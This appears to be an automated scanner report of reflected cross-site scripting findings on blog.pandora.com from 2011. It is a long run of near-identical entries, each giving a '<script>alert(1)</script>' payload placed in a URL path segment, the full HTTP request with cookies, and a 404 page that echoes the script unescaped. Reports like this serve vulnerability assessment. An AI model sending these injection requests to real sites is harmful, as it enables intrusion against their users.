The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4aa7e<script>alert(1)</script>1648ab9c938 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora4aa7e<script>alert(1)</script>1648ab9c938/archives/maine/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 347
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora4aa7e<script>alert(1)</script>1648ab9c938/archives/maine/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a36c6<script>alert(1)</script>9fa19fe371 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesa36c6<script>alert(1)</script>9fa19fe371/maine/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 346 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesa36c6<script>alert(1)</script>9fa19fe371/maine/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 32ddc<script>alert(1)</script>3ce6ddf7419 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/maine32ddc<script>alert(1)</script>3ce6ddf7419/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 347
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/maine32ddc<script>alert(1)</script>3ce6ddf7419/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b372a<script>alert(1)</script>0ef2d728dc3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorab372a<script>alert(1)</script>0ef2d728dc3/archives/maryland/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 350 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorab372a<script>alert(1)</script>0ef2d728dc3/archives/maryland/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 35554<script>alert(1)</script>d313a9d9657 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives35554<script>alert(1)</script>d313a9d9657/maryland/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives35554<script>alert(1)</script>d313a9d9657/maryland/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload efc2f<script>alert(1)</script>d3dbd7d1589 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/marylandefc2f<script>alert(1)</script>d3dbd7d1589/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/marylandefc2f<script>alert(1)</script>d3dbd7d1589/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 682e0<script>alert(1)</script>d4489f6734 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora682e0<script>alert(1)</script>d4489f6734/archives/massachusetts/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:05 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora682e0<script>alert(1)</script>d4489f6734/archives/massachusetts/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8c214<script>alert(1)</script>b8b28cef3de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives8c214<script>alert(1)</script>b8b28cef3de/massachusetts/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:08 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 355
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives8c214<script>alert(1)</script>b8b28cef3de/massachusetts/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 40eea<script>alert(1)</script>4daafa849f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/massachusetts40eea<script>alert(1)</script>4daafa849f6/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:10 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 355
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/massachusetts40eea<script>alert(1)</script>4daafa849f6/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7ee6f<script>alert(1)</script>47d2dc5e8b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora7ee6f<script>alert(1)</script>47d2dc5e8b5/archives/michigan/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora7ee6f<script>alert(1)</script>47d2dc5e8b5/archives/michigan/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 947a8<script>alert(1)</script>db5c6120320 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives947a8<script>alert(1)</script>db5c6120320/michigan/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:00 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives947a8<script>alert(1)</script>db5c6120320/michigan/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6569b<script>alert(1)</script>31ac4934856 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/michigan6569b<script>alert(1)</script>31ac4934856/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/michigan6569b<script>alert(1)</script>31ac4934856/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8487c<script>alert(1)</script>81afb429dac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8487c<script>alert(1)</script>81afb429dac/archives/minnesota/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 351 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8487c<script>alert(1)</script>81afb429dac/archives/minnesota/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d0986<script>alert(1)</script>4df760a3378 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesd0986<script>alert(1)</script>4df760a3378/minnesota/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesd0986<script>alert(1)</script>4df760a3378/minnesota/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5a5b3<script>alert(1)</script>d9de8f83c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/minnesota5a5b3<script>alert(1)</script>d9de8f83c0/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/minnesota5a5b3<script>alert(1)</script>d9de8f83c0/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f5c1c<script>alert(1)</script>f85b07012ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraf5c1c<script>alert(1)</script>f85b07012ec/archives/mississippi/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 353
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraf5c1c<script>alert(1)</script>f85b07012ec/archives/mississippi/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f4c87<script>alert(1)</script>6fe976a7326 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf4c87<script>alert(1)</script>6fe976a7326/mississippi/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 353
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesf4c87<script>alert(1)</script>6fe976a7326/mississippi/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9c40e<script>alert(1)</script>d255db79943 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/mississippi9c40e<script>alert(1)</script>d255db79943/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:04 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 353
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/mississippi9c40e<script>alert(1)</script>d255db79943/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e7363<script>alert(1)</script>be446c1f728 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorae7363<script>alert(1)</script>be446c1f728/archives/missouri/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorae7363<script>alert(1)</script>be446c1f728/archives/missouri/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 80b38<script>alert(1)</script>f1ed4fecb73 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives80b38<script>alert(1)</script>f1ed4fecb73/missouri/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:06 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
